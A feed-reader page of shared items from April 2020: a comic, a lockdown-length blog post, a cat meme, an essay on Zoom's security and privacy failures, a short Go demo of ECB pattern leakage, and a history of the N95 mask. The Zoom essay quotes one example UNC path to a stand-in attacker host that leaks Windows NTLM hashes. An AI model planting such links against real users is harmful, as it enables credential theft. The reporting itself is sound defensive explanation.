Just because I don't care doesn't mean I don't understand.

Arlo and Janis by Jimmy Johnson for Mon, 06 Apr 2020

1 Comment

Arlo and Janis by Jimmy Johnson on Mon, 06 Apr 2020

Source - Patreon

jgbishop
17 hours ago
These are the thoughts of everyone everywhere.
Durham, NC

Microsoft Edge is now 2nd most popular desktop browser, beats Firefox

1 Comment
The Microsoft Edge browser is now being used by more people than Mozilla Firefox, making it the 2nd most popular desktop browser. [...]
jgbishop
1 day ago
Part of me is surprised, and part of me isn't.
Durham, NC

We're in for 2 Months

1 Comment
by Valentin, April 04 2020, in random

One of my activities during the lockdown here in France is trying to predict how long the lockdown will last. The data I'm using comes from here.

Below is a plot of the rate of growth of Covid-19 in Hubei, Italy, and France, starting from the day each region has started its lockdown. The rate of growth at a given day is the number of new cases on this day, as a percentage of the number of cases from the previous day. The rate of growth is constant for an exponential evolution, and is 0 when there is no more growth. (Mathematically, it is the derivative of the function divided by the function itself.)


Source script

Hubei has some statistical aberrations which make the plot go wild in some places. They may be the result of changes from one counting method to another. For example, at some point they started adding people clinically diagnosed with symptoms of pneumonia (most likely Covid-19) on top of those who tested positive for SARS-CoV-2.

What we see in the plot is that:

  • Locking down works. For each of the countries, locking down eventually brings the growth significantly down. Italy has been on a smooth decline since the beginning of their lockdown. You may read articles in the press about how they're finally beating the virus, which is just a way of saying that the rate of growth has decreased under some arbitrary threshold. It has been decreasing from the start.
  • It takes time to kill growth. Hubei needed 30 days for the growth to almost come to a stop.
  • Even if they don't start at the same rate of growth, it looks like each country is ultimately going to take around 30 or 40 days to kill growth.

Why does it take so much time? I have 2 explanations for it.

Explanation number 1 is the incubation period of Covid-19, which ranges between 5 days and 14 days. This means that the last people who were contaminated just before the lockdown (which is most of the contaminated people, because of exponential growth) will start going through the disease between 5 days and 14 days into the lockdown. Once they are sick, the symptoms tend to peak between 2 and 3 days into the illness, which is the moment they reach for medical assistance and get tested. So it is expected that the measured number of contaminated people could continue growing up to 17 days after the start of the lockdown.

17 days is still less than the 30 days we're observing here, which brings me to the second explanation: the lockdown is not perfect. Some people cannot work from home and still go to work. People need to buy groceries, and go to the shop. People order deliveries, with packaging touched by other people. People get sick for various reasons, so they go to the doctor, where other people are waiting. And so on and so forth.

The fact that there are contaminations even during the lockdown seems to be corroborated by another metric, which is: once there is no more growth, how many of all the people who have tested positive are still sick? The answer is: most of them. The following graph shows the number of unrecovered cases of Covid-19 against the total number of cases in Hubei after 30 days of lockdown. That is, once there is almost no more growth.


Source script

We see that even when the virus has stopped spreading, a large majority of all Covid-19 cases are still positive, and it takes another 30 days before most of them recover and there is only a small minority which is still positive.

My initial reaction was that it is no problem to stop the lockdown after the first month, you just have to keep the still-ill locked down until they recover. The problem is that it is well-known that the number of measured cases is way lower than the number of total cases, because only the worst cases get tested. So we must imagine that this graph only represents a subset of the entire set of Covid-19 cases, and their sizes evolve proportionally. So if you let out people at Day 30, you're actually letting out people among a sh#tload of people who are positive, and therefore at risk of spreading the virus again.

You can read the complete Hubei lockdown timeline here, from which I extract 3 bullet points:

  • 23 January: lockdown
  • 6 March: first day with 0 new cases
  • 27 March: lockdown lifted

The rest of the world waited for the last moment to put lockdowns in place, and started experiencing hindsight bias about the fact that it was pretty much announced by China one month before. If this time we stop playing the game of "in our country it's going to be different than in China", then the prediction for the duration of the lockdown is: 2 months.

jgbishop
2 days ago
We've got a long road ahead.
Durham, NC

Pathetic!

1 Share
cat memes - 9464830720

Submitted by: (via Dump a day)

Tagged: cat memes
jgbishop
2 days ago
Durham, NC

Security and Privacy Implications of Zoom

2 Comments

Over the past few weeks, Zoom's use has exploded since it became the video conferencing platform of choice in today's COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom's problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom's privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by "sell." We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don't think most of our users would see us as selling their information, as that practice is commonly understood.

"Depends what you mean by 'sell.'" "...most of our users would see us as selling..." "...as that practice is commonly understood." That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who "download[ed] an app from the Marketplace" remember consenting to them giving your personal data to third parties? I don't.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[...]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There's lots more. It's better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages "marketing websites," which means it's still using third-party trackers and surveillance-based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom's security is at best sloppy, and malicious at worst. Motherboard reported that Zoom's iPhone app was sending user data to Facebook, even if the user didn't have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

"We originally implemented the 'Login with Facebook' feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data," Zoom told Motherboard in a statement on Friday.

This isn't the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user's web camera without the user's knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users' Windows credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they're using. The Zoom app for Windows automatically converts these so-called universal naming convention strings -- such as \\attacker.example.com/C$ -- into clickable links. In the event that targets click on those links on networks that aren't fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people's LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I'm sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom's encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn't. It only provides link encryption, which means everything is unencrypted on the company's servers. From the Intercept:

In Zoom's white paper, there is a list of "pre-meeting security capabilities" that are available to the meeting host that starts with "Enable an end-to-end (E2E) encrypted meeting." Later in the white paper, it lists "Secure a meeting with E2E encryption" as an "in-meeting security capability" that's available to meeting hosts. When a host starts a meeting with the "Require Encryption for 3rd Party Endpoints" setting enabled, participants see a green padlock that says, "Zoom is using an end to end encrypted connection" when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, "Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection."

They're also lying about the type of encryption. On 4/3, Citizen Lab reported:

Zoom documentation claims that the app uses "AES-256" encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber's company, are outside of China.

I'm okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom's software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren't great, and if you don't configure your meetings right you're leaving yourself open to all sorts of mischief.

"Zoombombing" is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content -- porn, mostly -- to everyone. It's awful if you're the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn't make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn't new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated -- which it should have done -- it enabled meeting passwords by default. Of course most of us don't use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don't share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That's what we know about Zoom's privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it's in the spotlight, it's all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let's see if that's anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or -- better yet -- abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin's comments.

jgbishop
3 days ago
Yeesh.
Durham, NC
1 public comment
Belfong
3 days ago
Horrible piece of shit company but we have no choice due to its popularity and many of the kids' schools are using it during Covid-19 lockdown.
malaysia
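
An added example for the Citizen Lab finding quoted in the Zoom story above (not code from Schneier, Citizen Lab or Zoom): AES-128 in ECB mode maps equal 16-byte plaintext blocks to equal ciphertext blocks, so counting repeated blocks in captured ciphertext exposes the mode, while AES-GCM (chosen here as the contrast mode) leaves no such pattern. The key, nonce and frame bytes are constructed for the demonstration, and the function names are hypothetical.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

const blockSize = aes.BlockSize // 16 bytes for every AES key size

// Constructed demo values; real code never hard-codes keys or reuses a GCM nonce.
var (
	demoKey   = []byte("constructed-key!") // 16 bytes -> AES-128
	demoNonce = []byte("nonce-000001")     // 12 bytes, the standard GCM nonce size
)

// sampleFrame builds a constructed 12-block "video frame": 11 identical
// background blocks and one block that differs.
func sampleFrame() []byte {
	background := bytes.Repeat([]byte{0x10}, blockSize)
	frame := bytes.Repeat(background, 5)
	frame = append(frame, []byte("SPEAKER-MOVED-01")...)
	return append(frame, bytes.Repeat(background, 6)...)
}

// encryptECB encrypts every 16-byte block independently under the same key,
// which is all that ECB mode does. The input must be block-aligned.
func encryptECB(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(plaintext)%blockSize != 0 {
		return nil, fmt.Errorf("length %d is not a multiple of %d", len(plaintext), blockSize)
	}
	out := make([]byte, len(plaintext))
	for i := 0; i < len(plaintext); i += blockSize {
		block.Encrypt(out[i:i+blockSize], plaintext[i:i+blockSize])
	}
	return out, nil
}

// encryptGCM encrypts with AES-GCM; the output is ciphertext plus a 16-byte tag.
func encryptGCM(key, nonce, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(nonce) != aead.NonceSize() {
		return nil, fmt.Errorf("nonce must be %d bytes", aead.NonceSize())
	}
	return aead.Seal(nil, nonce, plaintext, nil), nil
}

// repeatedBlocks counts 16-byte blocks that duplicate an earlier block.
// A high count in ciphertext is a strong sign of ECB (or no encryption).
func repeatedBlocks(data []byte) int {
	seen := make(map[[blockSize]byte]bool)
	repeats := 0
	for i := 0; i+blockSize <= len(data); i += blockSize {
		var b [blockSize]byte
		copy(b[:], data[i:i+blockSize])
		if seen[b] {
			repeats++
		}
		seen[b] = true
	}
	return repeats
}

func main() {
	frame := sampleFrame()
	ecb, err := encryptECB(demoKey, frame)
	if err != nil {
		panic(err)
	}
	gcm, err := encryptGCM(demoKey, demoNonce, frame)
	if err != nil {
		panic(err)
	}
	fmt.Printf("plaintext:   %d repeated blocks\n", repeatedBlocks(frame))
	fmt.Printf("AES-128-ECB: %d repeated blocks\n", repeatedBlocks(ecb))
	fmt.Printf("AES-128-GCM: %d repeated blocks\n", repeatedBlocks(gcm))
}
```

The ECB ciphertext repeats exactly as often as the plaintext does, which is the pattern preservation Citizen Lab describes.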

The origin story of the N95 mask

1 Comment

The most important design object of our time was more than a century in the making.

The untold origin story of the N95 mask
[Source Images: onlyyouqj/iStock, 3M]

It’s hard to think of a symbol of COVID-19 more fraught than the N95 respirator. The mask fits tightly around the face and is capable of filtering 95% of airborne particles, such as viruses, from the air, which other protective equipment (such as surgical masks) can’t do. It’s a life-saving device that is now in dangerously short supply. As such, it has come to represent the extreme challenges of the global response to COVID-19.

How did a flimsy polymer cup become the most significant health device of the 21st century? It all started in 1910 with a little-known doctor who wanted to save the world from one of the worst diseases ever known.

The first masks were about stopping smell

Going back even further—long before we understood that bacteria and viruses could float through the air and make us sick—people improvised masks to cover their faces, says Christos Lynteris. Lynteris is a senior lecturer at the Department of Social Anthropology at the University of St. Andrews, who is an expert in medical mask history.

He points to Renaissance-era paintings where people cover their noses with handkerchiefs to avoid illness. There are even paintings from Marseilles in 1720, which was the epicenter of the bubonic plague, that show gravediggers and people handling bodies with cloth around their faces, even though the plague was spread by the bites of fleas that traveled on rats.

“It was not meant to be against the contagion,” says Lynteris of the practice. “The reason these people were wearing cloth around their mouths and noses was, at the time, they generally believed diseases like the plague were miasma, or gases emanating from the ground. It wasn’t to protect you from another person, they believed plague was in the atmosphere—corrupt air.”

Copper engraving of Dr. Schnabel, a plague doctor in 17th century Rome. [Image: Wiki Commons]

The theory of miasma is what drove the design of the infamous plague masks seen across Europe in the 1600s, which would be worn by doctors who identified the plague and marked the infected by tapping them with a stick. These elongated masks resembled large bird beaks and had two nostril ports at the edge of the mask that could be loaded with incense. People thought that by protecting themselves from the smell of the plague, they’d be protected from the plague itself.

“The stench causes disease. This [thought] continued all the way to the early 19th century,” says Lynteris. (It’s worth noting that, 200 years later, a French physician named Antoine Barthélemy Clot-Bey argued that the bird-like plague masks themselves were responsible for the spread of the plague because they made people scared, and a frightened body was at greater risk for disease.)

By the late 1870s, scientists learned about bacteria. Miasma fell from fashion as the modern field of microbiology emerged. And yet, what came next looked a whole lot like what came before—minus the creepy birds. “We often think of scientific paradigm shifts leading to breaks, but all the technologies used against germs by the end of the 19th century were [riffs] on technologies from miasma.”

A glorified handkerchief

Doctors started wearing the first surgical masks in 1897. They weren’t much more than a glorified handkerchief tied around one’s face, and they weren’t designed to filter airborne disease—that’s still not the point of surgical masks today. They were (and are) used to prevent doctors from coughing or sneezing droplets onto wounds during surgery.

This distinction between a mask and a respirator is important. It’s why healthcare professionals are upset that they’re being instructed to wear surgical masks when respirators are unavailable. Masks are not only made of different materials; they fit loosely on the face, so that particles can come in from the side. Respirators create an airtight seal so they actually filter inhalation.

The first modern respirator is born from plague—and racism

Healthcare workers in “anti-plague masks” during the 1911 Manchurian plague. [Photo: courtesy University of Cambridge/Centre for Research in the Arts, Humanities and Social Sciences (CRASSH, The University of Cambridge)/The University of Hong Kong Libraries]

In the fall of 1910, a plague broke out across Manchuria—what we know now as Northern China—which was broken up in politically complex jurisdictions shared between China and Russia.

“It’s apocalyptic. Unbelievable. It kills 100% of those infected, no one survives. And it kills them within 24 to 48 hours of the first symptoms,” says Lynteris. “No one has come across something like this in modern times, and it is similar to the descriptions of Black Death.”

What followed was a scientific arms race, to deduce what was causing the plague and stop it. “Both Russia and China want to prove themselves worthy and scientific enough, because that would lead to a claim of sovereignty,” says Lynteris. “Whomever is scientific enough should be given control of this rich and important area.”

The Chinese Imperial Court brought in a doctor named Lien-teh Wu to head its efforts. He was born in Penang and studied medicine at Cambridge. Wu was young, and he spoke lousy Mandarin. In a plague that quickly attracted international attention and doctors from around the world, he was “completely unimportant,” according to Lynteris. But after conducting an autopsy on one of the victims, Wu determined that the plague was not spread by fleas, as many suspected, but through the air.

Expanding upon the surgery masks he’d seen in the West, Wu developed a hardier mask from gauze and cotton, which wrapped securely around one’s face and added several layers of cloth to filter inhalations. His invention was a breakthrough, but some doctors still doubted its efficacy.

“There’s a famous incident. He’s confronted by a famous old hand in the region, a French doctor [Gérald Mesny] . . . and Wu explains to the French doctor his theory that plague is pneumonic and airborne,” Lynteris says. “And the French guy humiliates him . . . and in very racist terms says, ‘What can we expect from a Chinaman?’ And to prove this point, [Mesny] goes and attends the sick in a plague hospital without wearing Wu’s mask, and he dies in two days with plague.”

Other doctors in the region quickly developed their own masks. “Some are . . . completely strange things,” Lynteris says. “Hoods with glasses, like diving masks.”

But Wu’s mask won out because in empirical testing, it protected users from bacteria. According to Lynteris, it was also a great design. It could be constructed by hand out of materials that were cheap and in ready supply. Between January and February of 1911, mask production ramped up to unknown numbers. Medical staff wore them, soldiers wore them, and some everyday people wore them, too. Not only did that help thwart the spread of the plague; the masks became a symbol of modern medical science looking an epidemic right in the eye.

Wu’s mask quickly became an icon through international newspaper reports. “The mask was a very novel thing . . . it had an effect of strangeness, which the press loved, but you imagine a black-and-white photograph with a white mask—it reads well,” says Lynteris. “It’s a marketing success.”

A streetcar conductor and passenger in Seattle wearing masks during the 1918 pandemic. [Photo: Wiki Commons]

When the Spanish flu arrived in 1918, Wu’s mask was well-known among scientists and even much of the public. Companies around the globe increased production of similar masks to help abate the spread of flu.

The N95 is made for industries but arrives just in time to hospitals

The N95 mask is a descendant of Wu’s design. Through World War I and World War II, scientists invented air-filtering gas masks that wrapped around your entire head to clean the air supply. Similar masks, loaded with fiberglass filters, began to be used in the mining industry to prevent black lung.

“All the respirators were these giant, gas mask-looking things,” says Nikki McCullough, an occupational health and safety leader at 3M, which manufactures N95 respirators. “You’d wash them out at night and you could wear them again.”

[Photo: 3M]

This equipment saved lives, but it was burdensome, and a large reason why were the filters. The fiberglass required a lot of effort to breathe, and the full head enclosures were hot to wear. By the 1950s, scientists began to understand the dangers of inhaling asbestos, but people working with asbestos preferred not to wear bulky respirator masks. Imagine working in construction in 85-degree heat and having your head wrapped in rubber to protect yourself from an invisible threat.

So in the 1970s, the Bureau of Mines and the National Institute for Occupational Safety and Health teamed up on creating the first criteria for what they called “single use respirators.” The first single-use N95 “dust” respirator as we know it was developed by 3M, according to the company, and approved on May 25, 1972. Instead of fiberglass, the company repurposed a technology it had developed for making stiffer gift ribbons into a filter, by taking a melted polymer and air-blasting it into layers of tiny fibers. “They look like somebody dropped a bunch of sticks—and they have huge spaces between them,” says McCullough.

As particles, whether silica or viruses, fly into this maze of sticks, they get stuck making turns. 3M also added an electrostatic charge to the material, so even smaller particles find themselves pulled toward the fibers. Meanwhile, because there are so many big holes, breathing is easy.

The longer you wear an N95 respirator, the more efficient it becomes at filtering out particles. More particles just help filter more particles. But breathing becomes more difficult over time as those gaping holes between the fibers get clogged up with particles, which is why an N95 respirator can’t be worn for more than about eight hours at a time in a very dusty environment. It doesn’t stop filtering; it just prevents you from breathing comfortably.

N95 respirators were used in industrial applications for decades before the need for a respirator circled back to clinical settings in the 1990s with the rise of drug-resistant tuberculosis. HIV had a lot to do with its spread across immunocompromised patients, but tuberculosis infected many healthcare workers, too. To stop its airborne spread, N95 standards were updated for healthcare settings, and doctors began wearing them when helping tuberculosis patients. Even still, respirators are rarely used in hospitals to this day because it’s only outbreaks like COVID-19 that necessitate so much protection.

As Lynteris and many others point out, the respirator never really faded from significance in China. Wu went on to found China’s version of the CDC, narrowly miss winning a Nobel Prize, and be featured in many biographies (including his own autobiography). More recently, during the SARS outbreak, people in China wore facial protection to prevent the spread of illness. Then as pollution took over cities like Beijing, they wore respirators to filter pollution.

The N95 respirator isn’t perfect. It isn’t designed to seal well to the face of children or those with facial hair, and if it doesn’t seal, it doesn’t work as advertised. Furthermore, the N95 variants that are worn in high-risk operating rooms don’t have an exhalation valve, so they can get particularly hot to wear.

But the N95 respirator evolved over hundreds of years in response to multiple crises. That evolution will only continue through and beyond the COVID-19 pandemic. McCullough says that 3M is constantly reevaluating the N95 respirator, tweaking everything from its filters to its ergonomics. “My mom would say they look pretty much the same [as in 1972], but we want them to look simple so they’re easy and intuitive to use,” says McCullough. “We’re always improving the technology. We have thousands of scientists at 3M working on [it].”

jgbishop
7 days ago
Interesting read.
Durham, NC